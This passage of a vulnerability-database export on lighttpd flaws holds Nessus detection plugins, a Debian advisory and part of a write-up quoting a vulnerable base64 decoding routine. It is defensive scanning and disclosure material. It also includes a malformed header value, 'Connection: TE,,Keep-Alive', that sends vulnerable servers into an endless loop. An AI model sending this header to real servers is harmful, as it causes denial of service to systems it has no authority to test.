When Server Name Indication (SNI) is enabled, a flaw\n exists that could cause the application to use all\n available SSL ciphers, including weak ciphers. Remote\n attackers could potentially hijack sessions or obtain\n sensitive information by sniffing the network.\n Note only versions 1.4.24 to 1.4.33 are affected.\n (CVE-2013-4508)\n\n - A flaw exists in the clang static analyzer because it\n fails to perform checks around setuid (1), setgid (2),\n and setgroups (3) calls. This could allow a remote\n attacker to gain elevated privileges. 
(CVE-2013-4559)\n\n - A use-after-free error exists in the clang static\n analyzer, when the FAM stat cache engine is enabled.\n This could allow remote attackers to dereference\n already freed memory and crash the program.\n (CVE-2013-4560)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.lighttpd.net/2014/1/20/1-4-34/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://redmine.lighttpd.net/issues/2525\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_01.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_02.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2013_03.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to lighttpd version 1.4.34 or later. 
Alternatively, apply the\nvendor-supplied patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:lighttpd:lighttpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"lighttpd_detect.nasl\");\n script_require_keys(\"installed_sw/lighttpd\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"lighttpd\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{\"fixed_version\":\"1.4.34\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": 
{"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:55:15", "bulletinFamily": "scanner", "description": "Updated lighttpd packages fix security vulnerabilities :\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network (CVE-2013-4508).\n\nIn lighttpd before 1.4.34, if setuid() fails for any reason, for\ninstance if an environment limits the number of processes a user can\nhave and the target uid already is at the limit, lighttpd will run as\nroot. A user who can run CGI scripts could clone() often; in this case\na lighttpd restart would end up with lighttpd running as root, and the\nCGI scripts would run as root too (CVE-2013-4559).\n\nIn lighttpd before 1.4.34, if fam is enabled and there are directories\nreachable from configured doc roots and aliases on which\nFAMMonitorDirectory fails, a remote client could trigger a DoS\n(CVE-2013-4560).", "modified": "2019-11-02T00:00:00", "id": "MANDRIVA_MDVSA-2013-277.NASL", "href": "https://www.tenable.com/plugins/nessus/71031", "published": "2013-11-22T00:00:00", "title": "Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:277)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:277. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(71031);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/08/02 13:32:55\");\n\n script_cve_id(\"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\");\n script_bugtraq_id(63534, 63686, 63688);\n script_xref(name:\"MDVSA\", value:\"2013:277\");\n\n script_name(english:\"Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:277)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated lighttpd packages fix security vulnerabilities :\n\nlighttpd before 1.4.34, when SNI is enabled, configures weak SSL\nciphers, which makes it easier for remote attackers to hijack sessions\nby inserting packets into the client-server data stream or obtain\nsensitive information by sniffing the network (CVE-2013-4508).\n\nIn lighttpd before 1.4.34, if setuid() fails for any reason, for\ninstance if an environment limits the number of processes a user can\nhave and the target uid already is at the limit, lighttpd will run as\nroot. 
A user who can run CGI scripts could clone() often; in this case\na lighttpd restart would end up with lighttpd running as root, and the\nCGI scripts would run as root too (CVE-2013-4559).\n\nIn lighttpd before 1.4.34, if fam is enabled and there are directories\nreachable from configured doc roots and aliases on which\nFAMMonitorDirectory fails, a remote client could trigger a DoS\n(CVE-2013-4560).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2013-0334.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_compress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/21\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_auth-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_cml-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_compress-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_magnet-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_mysql_vhost-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.30-6.2.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_webdav-1.4.30-6.2.mbs1\")) 
flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:37:10", "bulletinFamily": "scanner", "description": "Lighttpd security advisory reports :\n\nCertain Connection header values will trigger an endless loop, for\nexample : ", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_1CD3CA4233E611E2A2555404A67EEF98.NASL", "href": "https://www.tenable.com/plugins/nessus/63016", "published": "2012-11-23T00:00:00", "title": "FreeBSD : lighttpd -- remote DoS in header parsing (1cd3ca42-33e6-11e2-a255-5404a67eef98)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63016);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/10 11:49:42\");\n\n script_cve_id(\"CVE-2012-5533\");\n\n script_name(english:\"FreeBSD : lighttpd -- remote DoS in header parsing (1cd3ca42-33e6-11e2-a255-5404a67eef98)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Lighttpd security advisory reports :\n\nCertain Connection header values will trigger an endless loop, for\nexample : 'Connection: TE,,Keep-Alive'\n\nOn receiving such value, lighttpd will enter an endless loop,\ndetecting an empty token but not incrementing the current string\nposition, and keep reading the ',' again and again.\n\nThis bug was introduced in 1.4.31, when we fixed an 'invalid read' bug\n(it would try to read the byte before the string if it started with\n',', although the value wasn't actually used).\"\n );\n # https://vuxml.freebsd.org/freebsd/1cd3ca42-33e6-11e2-a255-5404a67eef98.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c383c1b5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/11/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/11/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lighttpd>1.4.30<1.4.32\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:55:14", "bulletinFamily": "scanner", "description": "The http_request_split_value function in request.c in lighttpd before\n1.4.32 allows remote attackers to cause a denial of service (infinite\nloop) via a request with a header containing an empty token, as\ndemonstrated using the Connection: TE,,Keep-Alive header\n(CVE-2012-5533).", "modified": "2019-11-02T00:00:00", "id": 
"MANDRIVA_MDVSA-2013-100.NASL", "href": "https://www.tenable.com/plugins/nessus/66112", "published": "2013-04-20T00:00:00", "title": "Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:100)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:100. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66112);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/08/02 13:32:55\");\n\n script_cve_id(\"CVE-2012-5533\");\n script_bugtraq_id(56619);\n script_xref(name:\"MDVSA\", value:\"2013:100\");\n script_xref(name:\"MGASA\", value:\"2012-0345\");\n\n script_name(english:\"Mandriva Linux Security Advisory : lighttpd (MDVSA-2013:100)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The http_request_split_value function in request.c in lighttpd before\n1.4.32 allows remote attackers to cause a denial of service (infinite\nloop) via a request with a header containing an empty token, as\ndemonstrated using the Connection: TE,,Keep-Alive header\n(CVE-2012-5533).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_auth\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_compress\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_auth-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_cml-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_compress-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_magnet-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_mysql_vhost-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.30-6.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lighttpd-mod_webdav-1.4.30-6.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2795-1 security@debian.org\r\nhttp://www.debian.org/security/ Michael Gilbert\r\nNovember 13, 2013 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : lighttpd\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2013-4508 CVE-2013-4559 CVE-2013-4560\r\nDebian Bug : 729453\r\n\r\nSeveral vulnerabilities have been discovered in the lighttpd web server.\r\n\r\nCVE-2013-4508\r\n\r\n It was discovered that lighttpd uses weak ssl ciphers when SNI (Server\r\n Name Indication) is enabled. This issue was solved by ensuring that\r\n stronger ssl ciphers are used when SNI is selected.\r\n\r\nCVE-2013-4559\r\n\r\n The clang static analyzer was used to discover privilege escalation\r\n issues due to missing checks around lighttpd's setuid, setgid, and\r\n setgroups calls. 
Those are now appropriately checked.\r\n\r\nCVE-2013-4560\r\n\r\n The clang static analyzer was used to discover a use-after-free issue\r\n when the FAM stat cache engine is enabled, which is now fixed.\r\n\r\nFor the oldstable distribution (squeeze), these problems have been fixed in\r\nversion 1.4.28-2+squeeze1.4.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 1.4.31-4+deb7u1.\r\n\r\nFor the testing distribution (jessie), these problems will be fixed soon.\r\n\r\nFor the unstable distribution (sid), these problems have been fixed in\r\nversion lighttpd_1.4.33-1+nmu1.\r\n\r\nWe recommend that you upgrade your lighttpd packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.15 (GNU/Linux)\r\n\r\niQQcBAEBCgAGBQJSgxenAAoJELjWss0C1vRzHPsgALdWQO7rsEWwjjP8fbQxsnTb\r\n7iNsBV66hCZ6W2xlSo8rVysE1QDqAptwwX3Xq0JHteM9edFlSUTyR8ir6P7Y1ISY\r\nRnBJBj3b52m+Ni/9itsiCsO+nxTwy7YI9E/mFX4/fqHBsBZ/bm/cLOcdE9pnBTyx\r\nGHMR4i1IsvrBNH0hcfnAWf2mlvX24Mvu2ViLJsPN9pjJIVtmuMFAh1LLfKvwJ104\r\ncBAMocie4KW7UtWTt6/cdXd306Sd4UbR/X5QVenvBLeFqoTStftXf91SvNjKzfO4\r\nup23uZ+CADam0mGoqDf5YnvUeCNjvKIDgHUFKMWcQ3lJgX1vOwkUP5+3WDHUI5Y+\r\nEFGYzf2/k2XL7cHykFXjHgIYrbpRHSru6attY2cC8dqMkPB6bkqXkErC3bZL67TX\r\n7Gfdm/ruVpjE3JUrxGbA9nfXYr2L2lysouTgkuP7BDB4gPYRQvmVNIaj9QXbQ66D\r\ns89PfkkHM1jqBM7+mhzanBcntf4c0buB2FwWZV9tKBel2Q0fxOTCpn1seerJzWwR\r\nWF7Ivl234rqm8AQil/KOFfx5LEd2hnfLEm04na9ujy6dzHEIP5jQ5qlckJYWj6br\r\n0bF5UnQu1I+A8z67NFdBdWgyzar0XNXkgGALPM1/59OquVKuWbqUrsZvxxv288ku\r\nFXuNnzkCs8eXGGJIl5CKABfTh7AfOXMd9dCYyDw6sA7ZlTjW/tebjrFGbyUqv5Ny\r\nZA6aweTymAzXLZ7md7hHHYDuVMLJQuLRel3DPlbThhrxa8sMsn7r51CnMS9WDxnY\r\nmwX1xpWdykttmWad6cv4K3sr73+N5SDQfaxES/Q0QVUvWjsmFYEF7aibcobaiRoO\r\n1lpZe1ThsCokR7l/o+Ja2X+sSC6mA8M+SJ83u8
sfFC/Z40r3+l0sV8W7a8dQNXdt\r\ns3mGMZsFpBqcvbHNmqL11eziNekuB7W+Tngk/5cJQ07f149JtvW7yJs7X64nSmER\r\np9smvZWC0CwKuWw8U6YwvIwcZgfGjfzUlcgMmD0n+jNtymVXbDDWyxBKuGXc1JMJ\r\n6SFw59/0YgidhP8SVvQ+a2BcgO7c+Ks7uz2dcuSPvsU8CCn1XLDzApcWNzkuUjsz\r\n7oYf10AkJ770BeMg7OzmZV1lHP3JXTZeM13ae9Y+14nq0ykY4hPGcEJN15K7Esnk\r\n1uNrI8cmAK+5IkgsjEkUidF7xvsfrMX/Fu3f0uMXZCOl+Rest5yHzncqe3V/CfG6\r\nOpLsHr+unMRZ107p8xSmV/CpzWuuR9rRNdH9Cle7omjF066nP/J8KskS5zWTJoPw\r\nzmJuow5+H2uiffE+Q29u6WgCNOEp2XXrgXNLxH6RXJiSIHk//3vwrw+tPRe8D+M=\r\n=cCF1\r\n-----END PGP SIGNATURE-----\r\n", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:DOC:30003", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30003", "title": "[SECURITY] [DSA 2795-1] lighttpd security update", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:53", "bulletinFamily": "software", "description": "Protection bypass, privilege escalation, memory corruption.", "modified": "2013-11-18T00:00:00", "published": "2013-11-18T00:00:00", "id": "SECURITYVULNS:VULN:13405", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13405", "title": "lighttpd multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:43", "bulletinFamily": "software", "description": "29 of November 2011 was the date of public disclosure interesting\r\nvulnerability in lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not propely decode characters from the extended\r\nASCII table. 
The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\nThis vulnerability may lead to an out-of-bounds read and theoretically cause a Segmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this vulnerability is\r\nexecuted correctly. Here is the output for one of the examples:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 